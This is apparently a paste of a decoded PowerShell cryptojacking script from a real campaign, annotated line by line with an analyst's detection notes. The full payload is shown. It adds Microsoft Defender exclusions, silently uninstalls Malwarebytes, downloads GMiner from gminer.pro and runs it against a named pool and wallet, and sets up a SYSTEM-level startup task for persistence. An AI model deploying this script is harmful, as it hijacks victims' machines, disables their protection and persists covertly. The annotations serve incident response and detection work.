
CryptoJack Decoding of PowerShell

a guest
Jul 2nd, 2021
  # Analyst's decode step, not part of the payload: Base64-decodes $text and
  # reads the bytes as UTF-16LE ("Unicode" in .NET). Decoding this way only
  # yields a string; nothing below is executed by it.
  # NOTE(review): Base64 over UTF-16LE is the format PowerShell's
  # -EncodedCommand expects, so the original was presumably launched that way;
  # the launching command line is not shown on this page.
  1. >> [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($text))
  2.  
  # Stage 1 of the decoded payload: restart any copy already on disk, weaken
  # endpoint protection, then probe for running miner processes.
  #
  # Tries to launch the batch file from an earlier install before doing
  # anything else; on a clean host the file does not exist yet.
  3. Start-Process cmd.exe -ArgumentList "/c start C:\users\public\NvidiaHelper\NvidiaHelper.bat"
  4.  
  5. Sleep 5
  6.  
  # Defense evasion: excludes the staging directory from Microsoft Defender
  # scanning. Exclusion changes are recorded by Defender as configuration
  # changes (event 5007 in its Operational log), and an exclusion under
  # C:\Users\Public is worth alerting on by itself.
  7. Add-MpPreference -ExclusionPath "C:\Users\Public\NvidiaHelper"
  # Attempts a silent uninstall of Malwarebytes through its own uninstaller.
  # NOTE(review): the inner double quotes are not escaped in the decoded text,
  # so this line may not parse the way the author intended; confirm from
  # process-creation telemetry whether unins000.exe actually ran.
  8. Start-Process cmd.exe -ArgumentList "/c "C:\Program files\Malwarebytes\Anti-Malware\unins000.exe" /verysilent /suppressmsgboxes /norestart"
  # Looks up three process names used by this campaign. Get-Process reports an
  # error when no process matches, leaving the variable $null; the branch that
  # follows keys off that.
  9. $H = Get-Process NvidiaHelper
  10. $64 = Get-Process NvidiaHelperX64
  11. $SNR = Get-Process SNR
  12.  
  # Stage 2: if any of the three miner processes is already running, only
  # report; otherwise wipe the previous install and redeploy from scratch.
  #
  # "Already running" branch: writes a marker file and appends the contents of
  # both batch files to it. Nothing is downloaded or changed on this path.
  # NOTE(review): NzbDrone is the former name of Sonarr; writing status into
  # its log directory suggests the operator can read that directory back.
  # How the script reached the host is not shown on this page; confirm.
  13. If($H.ProcessName -ne $null -or $64.ProcessName -ne $null -or $SNR.ProcessName -ne $null){New-Item -Path "C:\ProgramData\NzbDrone\logs\SNR.txt" -Value "Already Running"
  14. Get-Content "C:\Users\Public\SNR\SNR.bat" | Add-Content "C:\ProgramData\NzbDrone\logs\SNR.txt"
  15. Get-Content "C:\Users\Public\NvidiaHelper\NvidiaHelper.bat" | Add-Content "C:\ProgramData\NzbDrone\logs\SNR.txt"}
  16.  
  17. Else{
  # Redeploy branch. Force-stops every cmd.exe the caller is allowed to stop
  # (not just its own), so users may notice console windows closing.
  18.  
  19. Stop-Process -Name cmd -Force
  # Re-applies the Defender exclusion, then removes both staging directories
  # and the old scheduled task so the install below starts clean.
  20. Add-MpPreference -ExclusionPath "C:\Users\Public\NvidiaHelper"
  21. Remove-Item C:\Users\Public\NvidiaHelper -Recurse -Force
  22. Remove-Item C:\Users\Public\SNR -Recurse -Force
  23.  
  24. Unregister-ScheduledTask -TaskName "SystemCheck" -TaskPath \ -Confirm:$False
  25.  
  # Builds a 12-character random worker name from 0-9, A-Z and a-z; the same
  # value is written to the status file at the end, which ties a host to the
  # worker name the pool sees.
  26. $Wrk = -join (((48..57)+(65..90)+(97..122)) * 80 |Get-Random -Count 12 |%{[char]$_})
  # Fetches a GMiner release archive over plain HTTP and unpacks it into the
  # excluded directory. The URL, the ZIP path and the PowerShell download are
  # network and file indicators for hunting.
  27. Invoke-WebRequest "http://gminer.pro/downloads?res=gminer_2_59_windows64.zip" -OutFile "C:\users\public\NvidiaHelper.ZIP"
  28. Expand-Archive -Path "C:\users\public\NvidiaHelper.ZIP" -DestinationPath "C:\users\public\NvidiaHelper" -Force
  # Writes the launcher batch file (a three-line string literal): change
  # directory, run the renamed miner with ethash against the pool, wallet and
  # worker name given below, then pause. Pool host:port and wallet are the
  # stable indicators; the worker name differs per install.
  29. New-Item -Path "C:\users\public\NvidiaHelper" -Name NvidiaHelper.bat -Value "CD C:\users\public\NvidiaHelper
  30. NvidiaHelper.exe --algo ethash --server eth.f2pool.com:6688 --user 0xe9f6091f7888362ad0bc47a74f46c64e21bf6679 --worker $Wrk
  31. pause" -Force
  # Masquerading: the miner binary is renamed to look like a GPU vendor helper.
  # A file-name match is not enough for triage; compare hash and signer.
  32. Rename-Item -Path "C:\users\public\NvidiaHelper\miner.exe" -NewName "NvidiaHelper.exe" -Force
  33.  
  # Persistence: scheduled task "SystemCheck" in the root task folder, run at
  # startup as NT AUTHORITY\SYSTEM with highest run level, launching the batch
  # file through cmd.exe. Task registration is visible in the TaskScheduler
  # Operational log (event 106) and, with object-access auditing enabled, as
  # Security event 4698.
  # The dash before Force on the Register-ScheduledTask line is an en dash
  # (U+2013), which PowerShell accepts as a parameter prefix; detections that
  # match only the ASCII hyphen will miss it.
  34. $Trigger= New-ScheduledTaskTrigger -AtStartup
  35. $User= "NT AUTHORITY\SYSTEM"
  36. $Action= New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c start C:\users\public\NvidiaHelper\NvidiaHelper.bat"
  37. Register-ScheduledTask -TaskName "SystemCheck" -Trigger $Trigger -User $User -Action $Action -RunLevel Highest –Force
  # Starts the miner immediately instead of waiting for a reboot, then deletes
  # the downloaded archive.
  38. Start-Process cmd.exe -ArgumentList "/c start C:\users\public\NvidiaHelper\NvidiaHelper.bat"
  39. Del "C:\users\public\NvidiaHelper.ZIP"
  40.  
  41. Sleep 10
  42.  
  # Self-check after 10 seconds: is the binary still on disk, does the task
  # exist, is the process running, and which video controller(s) WMI reports.
  # "Deleted" means the executable is missing at check time. $SNR is reused
  # here as a status string (earlier it held a Get-Process result).
  43. $Chk = Get-ChildItem "C:\Users\Public\NvidiaHelper\NvidiaHelper.exe"
  44. $ChkTask = Get-ScheduledTask -TaskName "SystemCheck"
  45. $Running = Get-Process -Name NvidiaHelper
  46. $GPU = Get-WmiObject Win32_VideoController | Select Name
  47. If($Chk -eq $null){
  48. $SNR = "Deleted"
  49. }Else{$SNR = "Not Deleted"}
  50. If($ChkTask -eq $null){
  51. $Task = "Not created"
  52. }Else{$Task = "Created"}
  53. If($Running -eq $Null){
  54. $RunningJob = "Not Running"}
  55. Else{$RunningJob = "Running"}
  # Writes the one-line status report (file / task / process state, worker
  # name, GPU) to the same SNR.txt path used by the "already running" branch.
  # For responders this file is a host artifact: it records the install
  # outcome and the worker name.
  56. New-Item -Path "C:\ProgramData\NzbDrone\logs\SNR.txt" -Value "File is $SNR - Task is $Task - Job is $RunningJob - $Wrk - $GPU"}